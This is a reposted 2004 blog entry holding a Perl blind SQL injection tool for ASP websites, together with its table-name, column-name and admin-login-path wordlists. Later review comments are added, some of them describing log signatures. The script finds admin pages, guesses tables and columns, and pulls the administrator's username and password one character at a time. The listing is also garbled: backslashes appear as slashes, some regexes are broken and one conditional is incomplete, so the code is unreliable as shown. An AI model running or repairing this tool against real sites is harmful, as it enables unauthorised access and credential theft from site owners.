ascc+asp自动注射代码,可以猜后台

原创 2004年08月31日 15:21:00
sqlscan.pl
Submitted by superhei on 2004, July 8, 2:17 AM. 我的DD
#!/usr/bin/perl
#Codz By 黑嘿黑<cnhacker521@hotmail.com>2004/1/21.
#Thx MIX

# Turn on autoflush for the selected output handle so progress output is
# not held back by buffering.
$|=1;
use IO::Socket;

# Banner and usage text.
# NOTE(review): every "/n", "/r" and "/a" in this listing is printed
# literally. The page appears to have lost its backslashes ("\n" -> "/n"),
# so the script shown here is not byte-for-byte what the author wrote.
print "=======================================================================/n";
print " The sqlform-find Script Codz By 黑嘿黑<QQ:123230273> /n";
print " Our Team : www.cnse8.com /n";
print " My Home : xyhack.91i.net /n";
print "=======================================================================/n";
print "Usage: sql.exe 127.0.0.1 80 /test/wenxue/readarticle.asp?id=3 测试成功 /n";
print "-----------------------------------------------------------------------/n";

# Positional arguments: host, port, request path including its query string,
# and the marker text whose presence in a response line is treated as a
# "true" answer by the grep /$judge/ checks further down.
# NOTE(review): the first `if` below has no body in this listing, so the file
# does not parse as shown; no visible line calls the `usage` sub defined at
# the bottom of the script.
if ($#ARGV<1)
if ($#ARGV>1){
$host=$ARGV[0];
$port=$ARGV[1];
$way=$ARGV[2];
$judge=$ARGV[3];}

# Load the three word lists from the current working directory, one entry
# per line: sqlfrom.txt (used later as table names), lines.txt (used as
# column names) and login.txt (used as page paths). Entries still carry
# their newline here; each loop chomps them before use.
# NOTE(review): two-argument open with bareword handles, and the first error
# message names "splfrom.txt" although the file opened is sqlfrom.txt.
open(DB, 'sqlfrom.txt') || die "Can't open splfrom.txt.";
@Form = <DB>;
close (DB);
open(L, 'lines.txt') || die "Can't open lines.txt.";
@lines = <L>;
close (L);
open(LG, 'login.txt') || die "Can't open login.txt.";
@login = <LG>;
close (LG);

# For each entry of login.txt, str1() requests that path on the target and
# returns the response lines. Every line is split on single spaces, and a
# hit is printed when the second field compares numerically equal to 200.
# The check runs on all response lines, not only the status line.
# Defender note: in access logs this stage is a run of GETs from one client
# for common admin/login page names, sent with "Referer: <host>" and an
# empty Cookie header (see str1).
foreach $log (@login){
chomp $log;
@res=str1();
foreach $check (@res){
($http,$code,$blah) = split(/ /,$check);
if($code == 200){
print "Kaka !! Find the login: http://$host$way1$log/n";
}
}
}
# For each entry of sqlfrom.txt, str() sends one probe with $line set to "*".
# If any response line matches $judge, the table name is printed and the
# probe is repeated once per entry of lines.txt, with $line set to that
# entry. Each column name whose response matches is printed.
# str() reads the globals $line and $sqlfrom, which is why they are assigned
# here rather than passed as arguments.
# NOTE(review): $judge is interpolated into the regex unescaped, so regex
# metacharacters in the marker text change what counts as a match.
foreach $sqlfrom (@Form){
chomp $sqlfrom;
$line="*";
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "/nKaKa !! Find the sqlfrom is /U/a/a$sqlfrom/E: /n";
foreach $line1 (@lines){
chomp $line1;
$line=$line1;
@res=str();
@num=grep /$judge/, @res;
$size=@num;
if ($size > 0){
print "/a$line1/n";
}
}
}
}

# Interactive stage: the operator types the table name and the id, username
# and password column names to use in the probes below.
# NOTE(review): "$SQLForm=", "$id=", "$Username=" and "$Password=" inside the
# double-quoted prompts are interpolated as variables. They were presumably
# escaped ("\$...") before this listing lost its backslashes.
print "/a/a/nInput the SQLForm of admin !/n$SQLForm=";$SQLForm=<STDIN>;chomp $SQLForm;
print "$id=";$ids=<STDIN>;chomp $ids;
print "$Username=";$usernames=<STDIN>;chomp $usernames;
print "$Password=";$passwords=<STDIN>;chomp $passwords;
print "/n/nNow , Start to Crack ! Please wait....../n/n";

#under here is SQL Words
# Each stage sets the globals $path1/$path2 (and $path3 for crackchar) that
# the helper concatenates around the value under test, then calls the helper.
# The stages depend on each other through globals: $id from the first stage
# is interpolated into later conditions, and crackchar() reads the $len set
# by the crackint() call just before it.
# Defender note: the probes only yield answers from a page that concatenates
# its query-string parameter into SQL, a condition that parameterized
# queries remove. In web-server logs the run appears as many GETs to one URL
# whose query string contains "%20and%20exists(select", about one per second
# (sleep(1) in the helpers).
# Stage 1: search 1..100 for a value of the id column that exists.
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20$ids=";
$path2 =")";
$id = crackint();
print "/n/nSuccessful,The id of the first admin's id is /a$id ./n/n";

# Stage 2: length of the password column for that id (1..100).
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($passwords)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print "/n/nSuccessful,The len of admin's password is /a$len ./n/n";

# Stage 3: password value, compared prefix by prefix with left().
$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($passwords,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@password = crackchar();
print "/n/nSuccessful,The admin's password is /a/a@password ./n/n";

# Stage 4: length of the username column; overwrites $len from stage 2.
$path1 ="%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20len($usernames)=";
$path2 = "%20and%20$ids=$id)";
$len = crackint();
print "/n/nSuccessful,The len of admin's name is $len ./n/n";

# Stage 5: username value, same prefix comparison as stage 3.
$path1 = "%20and%20exists(select%20$ids%20from%20$SQLForm%20where%20left($usernames,";
$path2 = ")='";
$path3 = "'%20and%20$ids=$id)";
@username = crackchar();
print "/n/nSuccessful,The admin's username is /a/a@username ./n/n";

print "KaKa !! /a/a/you can use /nusername: @username/npassword: @password/nto login test !/r/n";


# crackint: linear search over the integers 1..100.
# For each candidate N it builds $path1 . N . $path2, sends
# "GET $way$path" through sock(), and returns the first N for which some
# response line matches $judge. If no candidate matches, the loop ends
# without an explicit return.
# Reads globals: $path1, $path2, $way, $host, $judge.
# Writes globals: @dic, $i, $req, @in, @num, $size.
# Pacing: one request per second (sleep(1)), at most 100 requests per call.
# NOTE(review): `my $path` is declared twice in the same scope, and the
# `last` after `return` is unreachable.
sub crackint {
@dic=(1..100);
for ($i=0;$i<@dic;$i++)
{
my $path=$path1.$dic[$i];
my $path=$path.$path2;
$req = "GET $way$path HTTP/1.0/r/n".
"Referer: http://$host$way/r/n".
"Host: $host/n/n";
print "$dic[$i].";
sleep(1);
@in = sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
return $dic[$i];
last;
}
}
}


# crackchar: recovers a string of $len characters one position at a time.
# For position $j (1..$len) it tries each candidate character appended to
# the prefix found so far ($pws), building
# $path1 . $j . $path2 . <prefix+candidate> . $path3, and keeps the first
# candidate whose response has a line matching $judge. If no candidate
# matches a position, $pws is left unchanged and the loop moves on.
# Candidates: digits, a-z, A-Z and two lists of ASCII and full-width
# punctuation; some ASCII entries are stored URL-encoded (%25, %26, %2b).
# Reads globals: $len, $path1, $path2, $path3, $way, $host, $judge.
# Returns the scalar $pws; the visible callers assign it to an array.
# Pacing: one request per second (sleep(1)).
# NOTE(review): the three substitutions before `return` are garbled in this
# listing (`s//%2b//+/ig`). Presumably they turned %2b, %25 and %26 back
# into "+", "%" and "&". Confirm against an unmangled copy.
# NOTE(review): `a..z`, `A..Z` and `th` are barewords, and `my $path` is
# redeclared four times in one scope.
sub crackchar {
my $pws;
my @dic11=(0..9);
my @dic12=(a..z);
my @dic13=(A..Z);
my @special=qw(` ~ ! @ # $ %25 ^ %26 * /( /) _ %2b = - { } [ ] : " ; < > ? | , . / /);
my @special2=qw( ` ~ ! · # ¥ % …… — * ( ) —— + - = { } [ ] : ” “ ; ’ 《 》 ? │ , 。 / 、 〈 〉 ');
my @dic=(@dic11,@dic12,@dic13,@special,@special2);
for ($j=1;$j<=$len;$j++)
{
for ($i=0;$i<@dic;$i++)
{
my $key=$pws.$dic[$i];
my $path=$path1.$j;
my $path=$path.$path2;
my $path=$path.$key;
my $path=$path.$path3;

$req = "GET $way$path HTTP/1.0/r/n".
"Referer: http://$host$way/r/n".
"Host:$host/n/n";
print "$dic[$i].";
sleep(1);
@in =sock($req);
@num=grep /$judge/, @in;
$size=@num;
if ($size > 0) {
$th=$j.th;
print "/nSuccessful,The $th word of the char is $dic[$i] /n";
$pws=$pws.$dic[$i];
last;
}
}
}

$pws=~s//%2b//+/ig;
$pws=~s//%25//%/ig;
$pws=~s//%26//&/ig;
return $pws;
}

# str: builds one probe from the globals $line (column, or "*") and $sqlfrom
# (table), appends it to $way, and sends it with sock(). The sub's value is
# the list of response lines returned by sock(), its last expression.
# The request carries "Referer: $host" and an empty "Cookie:" header, which
# makes it recognisable in server logs.
sub str{
$path="%20and%20exists(select%20".$line."%20from%20$sqlfrom)";
$req = "GET $way$path HTTP/1.0/n".
"Host: $host/n".
"Referer: $host/n".
"Cookie: /n/n";
sock($req);
}

# str1: requests "$way1$log", where $log is the current login.txt entry and
# $way1 is $way with its trailing length($ss) characters removed. The sub's
# value is the list of response lines returned by sock().
# NOTE(review): the split pattern is garbled in this listing (`////`). It
# presumably split $way on "/" so that $ss is the last path component and
# $way1 the containing directory. Confirm against an unmangled copy.
# NOTE(review): $ss is indexed with the global $i, not with the element
# count $s computed on the line before; $i is not set by any visible line
# before the first call.
sub str1{
@s=split(////,$way);
$s=@s;
$ss=@s[$i-1];
$d=length($ss);
$e=length($way);
$way1=substr($way,0,$e-$d);
$req = "GET $way1$log HTTP/1.0/n".
"Host: $host/n".
"Referer: $host/n".
"Cookie: /n/n";
sock($req);
}

# sock: opens a plain TCP connection to the global $host:$port, writes the
# request string passed as the only argument, reads the whole response as a
# list of lines, closes the socket and returns that list.
# Dies with a message if the connection cannot be made.
# A new connection is opened per request. No Timeout option is passed to the
# constructor.
sub sock{
my ($req) = @_;
my $connection = IO::Socket::INET->new(Proto =>"tcp",
PeerAddr =>$host,
PeerPort =>$port) || die "Sorry! Could not connect to $host /n";

print $connection $req;
my @res = <$connection>;
close $connection;
return @res;
}
# usage: interactive fallback that reads $host, $port, $way and $judge from
# STDIN into the same globals the command-line branch sets.
# No visible line calls it; the truncated `if ($#ARGV<1)` near the top of
# the script is presumably where it was invoked. Confirm against an
# unmangled copy.
# NOTE(review): "$Host=", "$Port=", "$Way=" and "$Judge=" in the prompts are
# interpolated as variables, presumably "\$..." before the backslashes were
# lost.
sub usage {
print "/nInput the Host Info !/n$Host=";$host=<STDIN>;chomp $host;
print "$Port=";$port=<STDIN>;chomp $port;
print "$Way=";$way=<STDIN>;chomp $way;
print "/Input the Judge Words !/n$Judge=";$judge=<STDIN>;chomp $judge;
}


=================== end =============================
sqlfrom.txt:

admin
user
users
userinfo
admin_userinfo
password
adminuser
manboard
diaryuseruser
pwd
t_user
用户
管理员

lines.txt:

id
userid
username
usr
admin
name
user
userpwd
password
pwd
passwd
psword
pass
pws
pwa
user_id
user_name
user_pass
admin_id
admin_name
admin_pass
admin_password
u_id
u_name
u_password
auid
apwd
姓名
密码

login.txt:

pass.asp
password.asp
psd.asp
username/login.asp
username/admin.asp
denglu.asp
login/admin.asp
login/login.asp
admin_login.asp
login_admin.asp
userlogin.asp
User.Asp
user/login.asp
admin/admin.asp
admin/login.asp
admin.asp
login.htm
admin_login/admin.asp
login_admin/login_admin.asp
login.asp
admpast.asp
admin_login.asp
adminlogin.asp
manageNews/index.htm
Admin/admin_login.asp
admin_index.asp
adminn/index.asp
admin/adminlogin.asp
admin/default.asp
manage/login.asp
